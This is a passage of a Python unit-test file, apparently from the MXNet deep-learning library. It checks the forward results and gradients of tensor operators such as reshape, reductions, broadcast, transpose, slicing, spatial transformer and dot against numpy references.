((64,), (16, 4, -4), True, (16, 4)),
((64,), (16, -1, -4), True, (16, 4)),
((1, 2, 3, 64), (-2, -1, 16, -4), True, (1, 2, 3, 4, 16))
])
def test_reshape_new(src_shape, shape_args, reverse, dst_shape):
net = mx.sym.Variable("data")
net = mx.sym.Reshape(net, shape=shape_args, reverse=reverse)
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(data=src_shape)
assert output_shape[0] == dst_shape, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
dat_npy = np.random.rand(*src_shape)
grad_npy = np.random.rand(*dst_shape)
exe = net.simple_bind(default_context(), data=src_shape)
exe.arg_dict['data'][:] = dat_npy
exe.forward(is_train=True)
assert np.square(exe.outputs[0].asnumpy() - dat_npy.reshape(dst_shape)).mean() < 1E-7, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s'\
%(str(src_shape), str(shape_args), str(reverse), str(dst_shape))
exe.backward(out_grads=mx.nd.array(grad_npy))
assert np.square(exe.grad_dict['data'].asnumpy() - grad_npy.reshape(src_shape)).mean() < 1E-7, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s'\
%(str(src_shape), str(shape_args), str(reverse), str(dst_shape))
for i in range(len(src_shape)):
holdout_src_shape = list(src_shape)
holdout_src_shape[i] = 0
holdout_src_shape = tuple(holdout_src_shape)
net = mx.sym.Variable('data')
net = mx.sym.elemwise_add(net.reshape(shape_args, reverse=reverse), mx.sym.ones(shape=dst_shape))
input_shape, output_shape, __ = net.infer_shape(data=holdout_src_shape)
assert output_shape[0] == dst_shape, \
'Holdout Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(holdout_src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
assert input_shape[0] == src_shape, \
'Holdout Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(holdout_src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
@with_seed()
def test_reshape_old():
net = mx.sym.Variable("data")
net = mx.sym.Reshape(net, target_shape=(2, 0))
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(data=(2, 3, 5, 5))
assert(output_shape[0] == (2, 75))
# Test for Flatten
data = mx.sym.Variable("data")
net = mx.sym.Flatten(data)
exe = net.simple_bind(ctx=default_context(), data=(5, 4, 3, 7))
data_npy = np.random.normal(size=(5, 4, 3, 7))
out_grad_npy = np.random.normal(size=(5, 4 * 3 * 7))
outputs = exe.forward(is_train=True, data=data_npy)[0].asnumpy()
assert_allclose(outputs, data_npy.reshape((5, 4 * 3 * 7)))
exe.backward(out_grads=[mx.nd.array(out_grad_npy, ctx=default_context())])
assert_allclose(exe.grad_arrays[0].asnumpy(), out_grad_npy.reshape((5, 4, 3, 7)))
@with_seed()
def test_reshape_like():
def test_reshape_like_new(lhs_shape, rhs_shape, lbeg, lend, rbeg, rend, dst_shape):
lhs = mx.sym.Variable("lhs")
rhs = mx.sym.Variable("rhs")
net = mx.sym.reshape_like(lhs, rhs, lhs_begin=lbeg, lhs_end=lend, rhs_begin=rbeg, rhs_end=rend)
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(lhs=lhs_shape, rhs=rhs_shape)
assert output_shape[0] == dst_shape, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
lhs_npy = np.random.rand(*lhs_shape)
rhs_npy = np.random.rand(*rhs_shape)
grad_npy = np.random.rand(*dst_shape)
exe = net.simple_bind(default_context(), lhs=lhs_shape, rhs=rhs_shape)
exe.arg_dict['lhs'][:] = lhs_npy
exe.arg_dict['rhs'][:] = rhs_npy
exe.forward(is_train=True)
assert np.square(exe.outputs[0].asnumpy() - lhs_npy.reshape(dst_shape)).mean() < 1E-7, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
exe.backward(out_grads=mx.nd.array(grad_npy))
assert np.square(exe.grad_dict['lhs'].asnumpy() - grad_npy.reshape(lhs_shape)).mean() < 1E-7, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
# Test new api (Using shape)
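    # With begin/end, reshape_like replaces lhs dims [lhs_begin, lhs_end) by rhs dims
    # [rhs_begin, rhs_end); None means "from the start" / "to the end", and negative
    # indices count from the right.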
test_cases = [
[(30,), (15,2,4), 0, None, 0, 2, (15,2)],
[(30,), (15,2,4), None, 1, None, 2, (15,2)],
[(30,7), (15,2,4), 0, 1, 0, 2, (15,2,7)],
[(3,5), (1,15,4), 0, 2, 1, 2, (15,)],
[(3,5), (1,15,4), 0, None, 1, -1, (15,)],
[(30,12), (4,2,2,3), -1, None, 1, None, (30,2,2,3)],
[(1,1,7,3,1,1), (81,1,1,21), 1, -1, 1, None, (1,1,1,21,1)]
]
for test_case in test_cases:
test_reshape_like_new(*test_case)
# Test old api
lhs = mx.sym.Variable("lhs")
rhs = mx.sym.Variable("rhs")
net = mx.sym.reshape_like(lhs, rhs)
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(lhs=(40, 30), rhs=(30,20,2))
assert(output_shape[0] == (30,20,2))
@with_seed()
def test_reduce():
sample_num = 500
def test_reduce_inner(numpy_reduce_func, numpy_reduce_grad_func, mx_reduce_sym, nan_prob=0,
test_exclude=True, test_none_axis=False):
for i in range(sample_num):
            # Generate random data with ndim between 1 and 5 and every shape dim between 1 and 5
# Insert a NaN with probability equal to nan_prob
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
axis_num = np.random.randint(0, ndim, size=1)
axis_flags = np.random.randint(0, 2, size=ndim)
if test_exclude:
exclude = np.random.randint(0, 2)
else:
exclude = False
axes = []
for (axis, flag) in enumerate(axis_flags):
if flag:
axes.append(axis)
if 0 == len(axes):
axes = None
elif 1 == len(axes):
axes = axes[0]
else:
axes = tuple(axes)
keepdims = np.random.randint(0, 2)
a = mx.symbol.Variable('a')
if axes is None:
if test_none_axis:
b = mx_reduce_sym(a, keepdims=keepdims, axis=axes)
else:
b = mx_reduce_sym(a, keepdims=keepdims)
elif exclude and isinstance(axes, tuple) and len(axes) < ndim:
naxes = [i for i in range(ndim) if i not in axes]
b = mx_reduce_sym(a, axis=naxes, keepdims=keepdims, exclude=True)
else:
b = mx_reduce_sym(a, axis=axes, keepdims=keepdims)
dat_npy = np.random.rand(*shape)
# Test with both negative and positive values (randomly). Avoid having both in the same
# test, which can be problematic for error checking due to near-zero values.
if np.random.rand() > 0.5:
dat_npy = -dat_npy
if nan_prob > 0:
dat_npy[np.random.rand(*shape) < nan_prob] = np.nan
sum_groundtruth = np.array(numpy_reduce_func(dat_npy, axis=axes, keepdims=keepdims))
if sum_groundtruth.shape == ():
sum_groundtruth = np.array([sum_groundtruth])
grad_nd = mx.nd.empty(shape)
outgrad_npy = np.array(np.random.rand(*sum_groundtruth.shape))
keepdim_shape = np_reduce(dat_npy, axes, 1, np.sum).shape
grad_groundtruth = numpy_reduce_grad_func(outgrad=outgrad_npy, data=dat_npy,
outdata=sum_groundtruth,
axis=axes, keepdims=keepdims,
keepdim_shape=keepdim_shape)
net = b.bind(default_context(), args={'a': mx.nd.array(dat_npy)},
args_grad={'a': grad_nd})
net.forward(is_train=True)
equal_forward = almost_equal_ignore_nan(net.outputs[0].asnumpy(), sum_groundtruth, 1E-4, 1E-4)
assert equal_forward
net.backward(out_grads=mx.nd.array(outgrad_npy))
bc_grad_groundtruth = np.broadcast_to(grad_groundtruth, grad_nd.shape)
equal_backward = almost_equal_ignore_nan(grad_nd.asnumpy(), bc_grad_groundtruth, 1E-4, 1E-4)
assert equal_backward
test_none_axis = [True, False]
for test_none in test_none_axis:
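        # Each call below pairs a numpy reduction with its analytic gradient:
        # sum -> broadcast outgrad; mean -> outgrad / reduction size; prod -> outgrad * out / data;
        # nansum/nanprod -> the same, but zero where the input is NaN;
        # max/min -> outgrad routed to the extremal elements; L2 norm -> outgrad * data / out.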
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.sum),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape),
mx.symbol.sum, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.mean),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape)/(data.size/outdata.size),
mx.symbol.mean, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.prod),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) * (outdata.reshape(keepdim_shape) / data),
mx.symbol.prod, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.nansum),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
np.where(np.isnan(data), 0, outgrad.reshape(keepdim_shape)),
mx.symbol.nansum, 0.3, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.nanprod),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
np.where(np.isnan(data), 0, outgrad.reshape(keepdim_shape) *
(outdata.reshape(keepdim_shape) / data)),
mx.symbol.nanprod, 0.3, test_none_axis=test_none)
# grad of max and min are sensitive to the precision of the calculation.
# Force numpy to match mxnet's float32.
test_reduce_inner(lambda data, axis, keepdims:np_reduce(np.float32(data), axis, keepdims, np.max),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) *
(np.equal(np.float32(data), outdata.reshape(keepdim_shape))),
mx.symbol.max)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(np.float32(data), axis, keepdims, np.min),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) *
(np.equal(np.float32(data), outdata.reshape(keepdim_shape))),
mx.symbol.min)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.linalg.norm),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) * (data / outdata.reshape(keepdim_shape)),
mx.symbol.norm, test_exclude=False, test_none_axis=test_none)
@with_seed()
def test_broadcast():
sample_num = 200
for i in range(sample_num):
        # Generate random data with ndim between 1 and 5 and every shape dim between 1 and 5
ndim = np.random.randint(1, 6)
target_shape = np.random.randint(1, 6, size=(ndim,))
axis = tuple(set(np.random.randint(0, ndim, np.random.randint(1, ndim + 1))))
shape = target_shape.copy()
size = tuple([shape[ele] for ele in axis])
for ele in axis:
shape[ele] = 1
target_shape_with_zero = list(target_shape)
for idx in range(len(target_shape_with_zero)):
if idx not in axis:
target_shape_with_zero[idx] = 0
break
a = mx.symbol.Variable('a')
sym_bcast_axis = mx.symbol.broadcast_axis(a, axis=axis, size=size)
sym_bcast_to = mx.symbol.broadcast_to(a, shape=tuple(target_shape))
sym_bcast_to_with_zero = mx.symbol.broadcast_to(a, shape=tuple(target_shape_with_zero))
sym_bcast_like = mx.symbol.broadcast_like(a, sym_bcast_to)
def test_broadcasting_ele(sym_bcast):
dat_npy = np.random.rand(*shape)
groundtruth = dat_npy
grad_nd = mx.nd.empty(shape)
outgrad_npy = np.random.rand(*target_shape)
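            # The gradient of broadcasting w.r.t. the input is the output gradient summed
            # over the broadcast axes (keepdims=True so it matches the input shape).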
grad_groundtruth = np_reduce(outgrad_npy, axis=axis, keepdims=True,
numpy_reduce_func=np.sum)
net = sym_bcast.bind(default_context(), args={'a': mx.nd.array(dat_npy)},
args_grad={'a': grad_nd})
net.forward(is_train=True)
assert (net.outputs[0].shape == target_shape).all()
assert_almost_equal(net.outputs[0], groundtruth, rtol=1e-4)
net.backward(out_grads=mx.nd.array(outgrad_npy))
assert_almost_equal(grad_nd, grad_groundtruth, rtol=1e-4)
test_broadcasting_ele(sym_bcast_axis)
test_broadcasting_ele(sym_bcast_to)
test_broadcasting_ele(sym_bcast_to_with_zero)
test_broadcasting_ele(sym_bcast_like)
@with_seed()
def test_transpose():
for ndim in range(1, 7):
for t in range(5):
dims = list(np.random.randint(1, 10, size=ndim))
axes = list(range(ndim))
random.shuffle(axes)
axes = tuple(axes)
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.transpose(x, axes=axes)
assert_allclose(np.transpose(x.asnumpy(), axes=axes), y.asnumpy())
y = mx.nd.transpose(x)
assert_allclose(np.transpose(x.asnumpy()), y.asnumpy())
@with_seed()
@pytest.mark.serial
def test_pseudo2dtranspose():
def getTwoInts(mn, mx):
n1 = np.random.randint(mn, mx)
n2 = np.random.randint(mn, mx-1)
n2 = n2 if n2 < n1 else n2+1
return tuple(np.sort([n1, n2]))
def getTranspAxes(ndim):
axes = list(range(ndim))
n1, n2 = getTwoInts(0,ndim)
return tuple(axes[:n1]+axes[n2:]+axes[n1:n2])
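    # Each generated permutation keeps a prefix of axes fixed and swaps two contiguous
    # blocks, so the transpose is equivalent to a batched 2-D transpose of flattened
    # blocks, i.e. the access pattern this "pseudo 2-D" test is meant to exercise.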
for ndim in range(2, 7):
for dt in ['int8', 'half', 'int32', 'int64']:
for _ in range(5):
dims = list(np.random.randint(5, 20, size=ndim))
axes = getTranspAxes(ndim)
x = mx.nd.array(np.random.normal(size=dims), dtype=dt)
y = mx.nd.transpose(x, axes=axes)
assert_allclose(np.transpose(x.asnumpy(), axes=axes), y.asnumpy())
@with_seed()
@pytest.mark.serial
def test_big_transpose():
n = [1]
d = list(np.random.randint(132, 160, size=1))
hw = list(np.random.randint(256, 320, size=2))
c = [10]
dims = n + d + hw + c
axes = (0,4,1,2,3)
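    # dims is laid out as (N, D, H, W, C); axes (0,4,1,2,3) moves the channel dim next to
    # the batch dim, and the second transpose below moves it back, so z must equal x.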
x_np = np.random.normal(size=dims).astype('uint8')
x = mx.nd.array(x_np, dtype='uint8')
y = mx.nd.transpose(x, axes=axes)
assert_allclose(np.transpose(x_np, axes=axes), y.asnumpy().astype('uint8'))
axes = (0,2,3,4,1)
z = mx.nd.transpose(y, axes=axes)
assert_allclose(x_np, z.asnumpy().astype('uint8'))
@with_seed()
@pytest.mark.serial
def test_larger_transpose():
x = mx.nd.random.normal(shape=(50,51))
y = mx.nd.transpose(x)
assert_allclose(np.transpose(x.asnumpy()), y.asnumpy())
@with_seed()
def test_expand_dims():
for ndim in range(1, 6):
for axis in range(-ndim + 1, ndim):
x = np.random.normal(size=list(np.random.randint(1, 10, size=ndim)))
y = mx.nd.array(x)
x1 = np.expand_dims(x, axis=axis)
y1 = mx.nd.expand_dims(y, axis=axis)
assert_allclose(x1, y1.asnumpy())
assert_allclose(x1.shape, y1.shape)
@with_seed()
def test_crop():
for ndim in range(1, 6):
for t in range(5):
dims = []
begin = []
end = []
idx = []
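            # For every dim, randomly express begin/end as None or as negative offsets so
            # all of crop's index conventions are exercised.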
for i in range(ndim):
d = random.randint(1, 5)
b = random.randint(0, d-1)
e = random.randint(b+1, d)
if b == 0 and random.randint(0, 1):
b = None
elif b != 0 and random.randint(0, 1):
b -= d
if e == d and random.randint(0, 1):
e = None
elif e != d and random.randint(0, 1):
e -= d
dims.append(d)
begin.append(b)
end.append(e)
idx.append(slice(b, e))
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.crop(x, begin=tuple(begin), end=tuple(end))
assert_allclose(x.asnumpy()[idx], y.asnumpy())
vx = mx.sym.Variable('x')
vy = mx.sym.crop(vx, begin=tuple(begin), end=tuple(end))
check_numeric_gradient(vy, [x.asnumpy()])
@with_seed()
def test_slice_axis():
for ndim in range(1, 6):
shape = np.random.randint(1, 11, size=(ndim,))
for t in range(ndim):
d = shape[t]
b = random.randint(0, d-1)
e = random.randint(b+1, d)
if np.random.rand() > 0.6:
e = None
else:
if e < d and np.random.rand() > 0.5:
e = e - d
if np.random.rand() > 0.5:
b = b - d
idx = []
for i in range(ndim):
idx.append(slice(0, shape[i]))
idx[t] = slice(b, e)
X = mx.symbol.Variable('X')
x = mx.nd.array(np.random.normal(size=shape))
Y = mx.symbol.slice_axis(data=X, axis=t, begin=b, end=e)
xgrad = mx.nd.empty(x.shape)
exec1 = Y.bind(default_context(), args = [x], args_grad = {'X': xgrad})
exec1.forward(is_train=True)
y = exec1.outputs[0]
assert_allclose(x.asnumpy()[idx], y.asnumpy())
exec1.backward([y])
xx = x.asnumpy()
xx[:] = 0.0
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx, xgrad.asnumpy())
x_grad_npy = np.random.normal(size=x.shape)
xgrad = mx.nd.array(x_grad_npy)
exec2 = Y.bind(default_context(), args=[x], args_grad={'X': xgrad}, grad_req="add")
exec2.forward(is_train=True)
exec2.backward([exec2.outputs[0]])
xx = np.zeros(shape=x.shape, dtype=np.float32)
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx + x_grad_npy, xgrad.asnumpy(), atol=1E-5)
@with_seed()
def test_slice_like():
for ndim in range(1, 6):
from_shape = np.random.randint(1, 11, size=(ndim,))
shape = [s + np.random.randint(0, 3) for s in from_shape]
for t in range(ndim):
if t > 0:
axes = np.random.randint(0, ndim, size=t).tolist()
else:
axes = []
idx = []
for i in range(ndim):
idx.append(slice(0, shape[i]))
if i in axes or not axes:
idx[i] = slice(0, from_shape[i])
if axes:
pos = np.random.randint(0, t)
if axes[pos] > 0:
axes[pos] -= ndim # negative index
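        # slice_like semantics: an empty axes list slices every dim down to shape_like,
        # otherwise only the listed axes (negative indices allowed) are sliced.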
X = mx.symbol.Variable('X')
X_1 = mx.symbol.Variable('X1')
x = mx.nd.array(np.random.normal(size=shape))
x1 = mx.nd.array(np.random.normal(size=from_shape))
Y = mx.symbol.slice_like(data=X, shape_like=X_1, axes=axes)
xgrad = mx.nd.empty(x.shape)
xgrad1 = mx.nd.empty(x1.shape)
exec1 = Y.bind(default_context(), args = [x, x1],
args_grad = {'X': xgrad, 'X1': xgrad1})
exec1.forward(is_train=True)
y = exec1.outputs[0]
assert_allclose(x.asnumpy()[idx], y.asnumpy())
exec1.backward([y])
xx = x.asnumpy()
xx[:] = 0.0
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx, xgrad.asnumpy())
assert_allclose(xgrad1.asnumpy(), mx.nd.zeros_like(xgrad1).asnumpy())
@with_seed()
def test_slice_like_different_types():
x = [[ 1., 2., 3., 4.],
[ 5., 6., 7., 8.],
[ 9., 10., 11., 12.]]
y = [[ 0., 0., 0.],
[ 0., 0., 0.]]
x = mx.nd.array(x)
y = mx.nd.array(y).astype('int32')
z = mx.nd.slice_like(x, y)
assert_allclose(z.asnumpy(), [[1,2,3],[5,6,7]])
@with_seed()
def test_reshape_like_different_types():
x = mx.nd.zeros((2, 3))
y = mx.nd.array([[1, 2], [3, 4], [5, 6]])
y = mx.nd.array(y).astype('int32')
z = mx.nd.reshape_like(x, y)
assert_allclose(z.asnumpy(), [[0,0],[0,0],[0,0]])
@with_seed()
def test_broadcast_like_different_types():
x = mx.nd.zeros((2, 1))
y = mx.nd.ones((2, 2))
y = mx.nd.array(y).astype('int32')
z = mx.nd.broadcast_like(x, y)
assert_allclose(z.asnumpy(), [[0,0],[0,0]])
assert x.dtype == z.dtype
@with_seed()
def test_flip():
for ndim in range(1, 6):
for t in range(5):
dims = [random.randint(1,10) for i in range(ndim)]
axis = random.randint(0, ndim-1)
idx = [slice(None, None, -1) if i == axis else slice(None, None) for i in range(ndim)]
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.flip(x, axis=axis)
assert_allclose(x.asnumpy()[idx], y.asnumpy())
@with_seed()
def test_stn():
import sys
np.set_printoptions(threshold=sys.maxsize)
num_filter = 2 # conv of loc net
kernel = (3, 3) # conv of loc net
num_hidden = 6 # fc of loc net
for n in [1, 2, 3, 4]:
for c in [1, 2, 3, 4]:
            for h in [5, 9, 13, 17]:  # for convenience, the third and fourth input dims should be 4x + 1
for w in [5, 9, 13, 17]:
data_shape = (n, c, h, w)
target_shape = (int((data_shape[2]+1)/2), int((data_shape[3]+1)/2))
data = mx.sym.Variable(name="data")
loc = mx.sym.Convolution(data=data, kernel=kernel, pad=(1, 1), num_filter=num_filter, name="loc_conv")
loc = mx.sym.Flatten(data=loc)
loc = mx.sym.FullyConnected(data=loc, num_hidden=num_hidden, name="loc_fc")
stn = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=target_shape,
transform_type="affine", sampler_type="bilinear")
arg_names = stn.list_arguments()
arg_shapes, out_shapes, _ = stn.infer_shape(data=data_shape)
# check shape
assert out_shapes[0] == (data_shape[0], data_shape[1], target_shape[0], target_shape[1])
dev = default_context()
#dev = mx.gpu(0)
args = {}
args['data'] = mx.random.normal(0, 1, data_shape, ctx=mx.cpu()).copyto(dev)
args['loc_conv_weight'] = mx.nd.zeros((num_filter, data_shape[1], kernel[0], kernel[1]), ctx=dev)
args['loc_conv_bias'] = mx.nd.zeros((num_filter,), ctx=dev)
args['loc_fc_weight'] = mx.nd.zeros((6, num_filter*data_shape[2]*data_shape[3]), ctx=dev)
args['loc_fc_bias'] = mx.nd.array([0.5, 0, 0, 0, 0.5, 0], ctx=dev)
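                    # With zero conv/fc weights the localization net outputs exactly the fc bias
                    # [0.5, 0, 0, 0, 0.5, 0], i.e. a pure 0.5x scaling, so the STN output should be
                    # the centre crop of the input, which is what the checks below compare against.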
grad_grad = [mx.nd.zeros(shape, ctx=dev) for shape in arg_shapes]
exe = stn.bind(dev, args=args, args_grad=grad_grad)
exe.forward(is_train=True)
out = exe.outputs[0]
# check forward
assert_almost_equal(out, args['data'].asnumpy()[:, :, h//4:h-h//4, w//4:w-w//4], rtol=1e-2, atol=1e-4)
out_grad = mx.nd.ones(out.shape, ctx=dev)
exe.backward([out_grad])
# check backward
assert_almost_equal(out_grad, grad_grad[0].asnumpy()[:, :, h//4:h-h//4, w//4:w-w//4], rtol=1e-2, atol=1e-4)
def test_stn_valid_sampling():
target_shape = (
28,
28,
)
src_shape = (
42,
42,
)
data = mx.sym.Variable(name="data")
loc = mx.sym.Variable(name="loc")
data_array = np.zeros((
1,
1,
) + src_shape)
# Have an ever so slight rotation.
loc_array = np.array(
[[9.03887e-05, 1.00015, 0.00174931, 1.0003, 0.000311901,
-0.000919065]])
stn = mx.sym.SpatialTransformer(
data=data,
loc=loc,
target_shape=target_shape,
transform_type="affine",
sampler_type="bilinear")
grad_req = {k: 'write' for k in stn.list_arguments()}
grads = {
'data': mx.nd.array(np.zeros_like(data_array)),
'loc': mx.nd.array(np.zeros_like(loc_array))
}
executor = stn.bind(
ctx=default_context(),
args={'data': mx.nd.array(data_array),
'loc': mx.nd.array(loc_array)},
grad_req=grad_req,
args_grad=grads)
executor.forward(is_train=True)
executor.backward(mx.nd.ones((
1,
1,
) + target_shape))
@with_seed()
def test_dot():
ctx = default_context()
dtypes = ['float32', 'float64']
ndims = [2]
if ctx.device_type == 'gpu':
dtypes += ['float16']
ndims += [1]
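        # float16 inputs and 1-D (vector) dot are only exercised on GPU in this test.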
# Test normal dot.
for ndim in ndims:
for data_type in dtypes:
tol = 1e-2 if data_type == 'float16' else 1e-3
for m in range(1, 5):
for k in range(1, 5):
                    if ndim == 1 and k != 1:
                        continue
for n in range(1, 5):
a_shape = (m, k) if ndim == 2 else (m,)
b_shape = (k, n) if ndim == 2 else (n,)
a_npy = np.random.normal(0, 1, (m, k))
a_npy = a_npy.astype(data_type)
b_npy = np.random.normal(0, 1, (k, n))
b_npy = b_npy.astype(data_type)
c_npy = np.empty((m, n), dtype=data_type)
ograd_npy = np.random.normal(0, 1, (m, n))
ograd_npy = ograd_npy.astype(data_type)
agrad_npy = np.empty((m, k), dtype=data_type)
bgrad_npy = np.empty((k, n), dtype=data_type)
c_npy[:, :] = np.dot(a_npy[:, :], b_npy[:, :])
bgrad_npy[:, :] = np.dot(a_npy[:, :].T, ograd_npy[:, :])
agrad_npy[:, :] = np.dot(ograd_npy[:, :], b_npy[:, :].T)
a = mx.sym.Variable('a', dtype=data_type)
b = mx.sym.Variable('b', dtype=data_type)
c = mx.sym.dot(a, b)
exe = c.simple_bind(ctx=ctx, a=a_npy.shape, b=b_npy.shape)
outputs = exe.forward(is_train=True, a=a_npy, b=b_npy)
assert_almost_equal(outputs[0], c_npy, rtol=tol, atol=tol)
exe.backward(out_grads=[mx.nd.array(ograd_npy, mx.cpu()).astype(data_type)])
assert_almost_equal(exe.grad_dict['a'], agrad_npy, rtol=tol, atol=tol)
assert_almost_equal(exe.grad_dict['b'], bgrad_npy, rtol=tol, atol=tol)
# Test dot with transpose flag using gradient checker.
def dot_sym(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y)
def dot_sym_xT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_a=True)
def dot_sym_yT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_b=True)
def dot_sym_xT_yT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_a=True, transpose_b=True)
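    # The gradient-checker tests below cover all four transpose-flag combinations; the
    # numpy operands are pre-transposed so each symbol still sees compatible shapes.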
for data_type in dtypes:
for ashape, bshape in [((3, 4), (4, 5)), ((2, 3, 4), (4, 5, 6))]:
m1_npy = np.random.uniform(-1, 1, ashape)
m1_npy = m1_npy.astype(data_type)
m2_npy = np.random.uniform(-1, 1, bshape)
m2_npy = m2_npy.astype(data_type)
check_numeric_gradient(dot_sym(data_type), [m1_npy, m2_npy], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_xT(data_type), [m1_npy.T, m2_npy], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_yT(data_type), [m1_npy, m2_npy.T], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_xT_yT(data_type), [m1_npy.T, m2_npy.T], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
@with_seed()
def test_batch_dot():
ctx = default_context()
dtypes = ['float32', 'float64']
if ctx.device_type == 'gpu':
dtypes += ['float16']
for data_type in dtypes:
for batch_size in range(1, 5):
for m in range(1, 5):
for k in range(1, 5):
for n in range(1, 5):
transpose_a = (np.random.rand() > 0.5)
transpose_b = (np.random.rand() > 0.5)
a_npy = np.random.normal(0, 1, (batch_size, m, k))
a_npy = a_npy.astype(data_type)
b_npy = np.random.normal(0, 1, (batch_size, k, n))
b_npy = b_npy.astype(data_type)
c_npy = np.empty((batch_size, m, n), dtype=data_type)
ograd_npy = np.random.normal(0, 1, (batch_size, m, n))
ograd_npy = ograd_npy.astype(data_type)
agrad_npy = np.empty((batch_size, m, k), dtype=data_type)
bgrad_npy = np.empty((batch_size, k, n), dtype=data_type)
a_init_grad_npy = np.random.normal(size=(batch_size, m, k))
a_init_grad_npy = a_init_grad_npy.astype(data_type)
b_init_grad_npy = np.random.normal(size=(batch_size, k, n))
b_init_grad_npy = b_init_grad_npy.astype(data_type)
for i in range(batch_size):
c_npy[i, :, :] = np.dot(a_npy[i, :, :], b_npy[i, :, :])
bgrad_npy[i, :, :] = np.dot(a_npy[i, :, :].T, ograd_npy[i, :, :])
agrad_npy[i, :, :] = np.dot(ograd_npy[i, :, :], b_npy[i, :, :].T)
a = mx.sym.Variable('a', dtype=data_type)
b = mx.sym.Variable('b', dtype=data_type)
c = mx.sym.batch_dot(a, b, transpose_a=transpose_a, transpose_b=transpose_b)
if transpose_a:
a_npy = np.transpose(a_npy, axes=(0, 2, 1))
agrad_npy = np.transpose(agrad_npy, axes=(0, 2, 1))
a_init_grad_npy = np.transpose(a_init_grad_npy, axes=(0, 2, 1))
if transpose_b:
b_npy = np.transpose(b_npy, axes=(0, 2, 1))
bgrad_npy = np.transpose(bgrad_npy, axes=(0, 2, 1))
b_init_grad_npy = np.transpose(b_init_grad_npy, axes=(0, 2, 1))
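                        # The numpy reference (c_npy, agrad_npy, bgrad_npy) was computed in the
                        # non-transposed layout, so inputs and expected gradients are transposed
                        # here to match the transpose_a/transpose_b flags given to batch_dot.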
exe = c.simple_bind(ctx=ctx,
a=a_npy.shape, b=b_npy.shape, grad_req='write')
exe_add = c.simple_bind(ctx=ctx,
a=a_npy.shape, b=b_npy.shape, grad_req='add')
exe_add.grad_dict['a'][:] = a_init_grad_npy
exe_add.grad_dict['b'][:] = b_init_grad_npy
outputs = exe.forward(is_train=True, a=a_npy, b=b_npy)
assert_almost_equal(outputs[0], c_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
exe.backward(out_grads=[mx.nd.array(ograd_npy, ctx=exe._ctx)])
assert_almost_equal(exe.grad_dict['a'], agrad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
assert_almost_equal(exe.grad_dict['b'], bgrad_npy,
